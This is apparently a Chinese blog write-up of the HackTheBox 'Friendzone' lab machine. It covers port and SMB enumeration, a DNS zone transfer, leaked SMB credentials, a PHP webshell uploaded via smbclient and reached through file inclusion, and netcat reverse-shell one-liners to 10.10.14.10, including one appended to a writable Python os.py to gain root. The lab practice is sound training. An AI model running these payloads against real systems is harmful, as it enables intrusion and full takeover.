HTB-Friendzone靶场

简介: HTB-Friendzone靶场

端口扫描

nmap -sS -Pn -n --open -T4 -p 1-65535 10.10.10.123


目录扫描

不清楚是什么,密码?cms?

smb漏洞扫描

enum4linux 10.10.10.123

    more creds.txt

    640.png

    发现了登陆密码

    admin:WORKWORKHhallelujah@#

    回头看,443端口是404,但是开了53端口,查看证书发现了一个域名

    640.png

    子域名目录扫描

    dirsearch https://friendzone.red/

    640.png

    base64解密也灭发现什么

    又把目标转到dns上了

    dig axfr friendzone.red @10.10.10.123

    640.png

    这些域名写入hosts

    文件包含

    然后挨个尝试

    密码就是smb里查到的admin

    让访问dash文件

    有点像文件包含漏洞,读passwd 没显示

    640.png

    当我读取login页面,发现成功了

    说明存在文件包含,这时登陆smb,写一个webshell,然后监听

    smb写文件

    但是路径不清楚,不过在前面smb漏洞扫描中发现其中有一个路径是/etc/file

    这里可使用nmap脚本进行探测

    nmap --script smb-enum-shares.nse -p445 10.10.10.123


    cat cmd.php
    <?php systems($_REQUEST['cmd']);?>
    smbclient  //10.10.10.123/Development -c 'put cmd.php 1.php'

    640.png

    文件包含,还是相对路径使用?传参数就不成功换成&就OK了

    https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=id

    反弹shell

    https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.10 7777 >/tmp/f

    root提权

    信息收集,使用pspy64 在opt下发现脚本文件

    640.png

    查询可写文件

    cd /usr/lib/python2.7
    find  -type f -writable -ls

    发现os.py可写入,于是写入反弹shell命令,运行脚本,就会引用os库,就能产生反弹shell

    echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 9999 >/tmp/f')" >> /usr/lib/python2.7/os.py

    总结:像HTB这种,每一个端口细节都不能放过,能渗透就都渗透一遍,常规端口不行,就全端口,一般也都是端口扫描,目录扫描,漏洞扫描,至于啥地步就看信息收集的能力了。


    相关文章
    |
    安全 测试技术 UED
    利用WPS-Office绕过UAC提权
    利用WPS-Office绕过UAC提权
    682 0
    |
    11月前
    |
    Shell Go 开发工具
    【环境】Rocky8使用gvm配置Go多版本管理的微服务开发环境(go-zero)
    通过本文的介绍,我们详细讲解了如何在Rocky8上使用gvm来管理多个Go版本,并配置go-zero框架的开发环境。通过gvm的灵活管理,开发者可以轻松切换不同的Go版本,以适应不同项目的需求。同时,go-zero框架的使用进一步提升了微服务开发的效率和质量。希望本文能帮助开发者构建高效的Go语言开发环境,提高项目开发的灵活性和稳定性。
    343 63
    |
    12月前
    |
    存储 安全 网络安全
    您的计算机已被DevicData勒索病毒感染?恢复您的数据的方法在这里!
    随着网络技术进步,网络安全威胁特别是勒索病毒如.DevicData日益严重,该病毒以独特加密方式和强大破坏力著称。遭遇.DevicData攻击后,数据恢复面临重重困难,解密工具也存在局限性。预防措施包括加强员工安全意识、定期更新软件、使用可靠防病毒程序、限制访问权限、定期备份重要数据、实施网络分段及启用多因素认证等。91数据恢复公司成功帮助一家科技企业应对了.DevicData勒索病毒危机,强调了数据备份与网络安全的重要性。对于希望保护自身免受此类威胁的个人或企业,应重视并采取上述最佳实践措施。(240字符)
    341 18
    |
    Java API 数据格式
    Spring Boot API参数读取秘籍大公开!6大神器助你秒变参数处理大师,让你的代码飞起来!
    【8月更文挑战第4天】Spring Boot凭借其便捷的开发和配置特性,成为构建微服务的热门选择。高效处理HTTP请求参数至关重要。本文介绍六种核心方法:查询参数利用`@RequestParam`;路径变量采用`@PathVariable`;请求体通过`@RequestBody`自动绑定;表单数据借助`@ModelAttribute`或`@RequestParam`;请求头使用`@RequestHeader`;Cookie则依靠`@CookieValue`。每种方法针对不同场景,灵活运用可提升应用性能与用户体验。
    320 9
    |
    传感器 数据采集 监控
    ERP系统中的生产过程监控与质量管理解析
    【7月更文挑战第25天】 ERP系统中的生产过程监控与质量管理解析
    633 0
    ERP系统中的生产过程监控与质量管理解析
    |
    SQL 安全 JavaScript
    0x00.基础漏洞篇
    0x00.基础漏洞篇
    523 3
    |
    存储 NoSQL Java
    Redis系列学习文章分享---第二篇(Redis快速入门之Java客户端--Jedis+连接池+SpringDataRedis+RedisTemplate+RedisSerializer+Hash)
    Redis系列学习文章分享---第二篇(Redis快速入门之Java客户端--Jedis+连接池+SpringDataRedis+RedisTemplate+RedisSerializer+Hash)
    434 0
    |
    存储 弹性计算 安全
    阿里云2核4G配置服务器可选实例及收费价格参考
    阿里云2核4G配置服务器的价格取决于所选云服务器的实例规格和带宽及系统盘大小,阿里云服务器2核4G配置有将近二十种实例规格可选,目前阿里云活动中2核4G配置有轻量应用服务器、经济型e、通用算力型u1、计算型c7和第八代计算型c8a与c8i实例可选,轻量应用服务器2核4G1M目前只要165元1年,云服务器ECS经济型e实例2核4G配置3M带宽40GB ESSD Entry云盘优惠价格57.94元3个月,云服务器ECS计算型c7实例2核4G配置3M带宽40GB ESSD云盘优惠价格290.55元6个月、611.10元1年。至于选择哪个实例规格,还需要根据自己的需求、预算及上云场景来综合判断。
    769 0
    阿里云2核4G配置服务器可选实例及收费价格参考
    Markdown支持的语言详解
    Markdown是轻量级标记语言,用于创建HTML文档。主要特性包括:标题(#)、列表(无序/有序)、链接和图片(![描述](地址)、[文字](地址))、粗体/斜体(**/__,*/_)、代码块(`)、表格(|)、引用(&gt;)、水平线(***)、强调(*或_)和数学公式(LaTeX语法)。不同解析器可能支持更多扩展功能。
    299 0
    |
    存储 SQL 关系型数据库
    探索非关系型数据库:走进灵活的数据存储世界
    在数字化时代,数据以前所未有的速度和规模增长。为了应对不同类型和结构的数据,非关系型数据库应运而生,为我们提供了一种灵活、可扩展的数据存储和管理方式。本文将引导您深入了解非关系型数据库的定义、特点、应用以及在现代技术中的重要性。
    737 4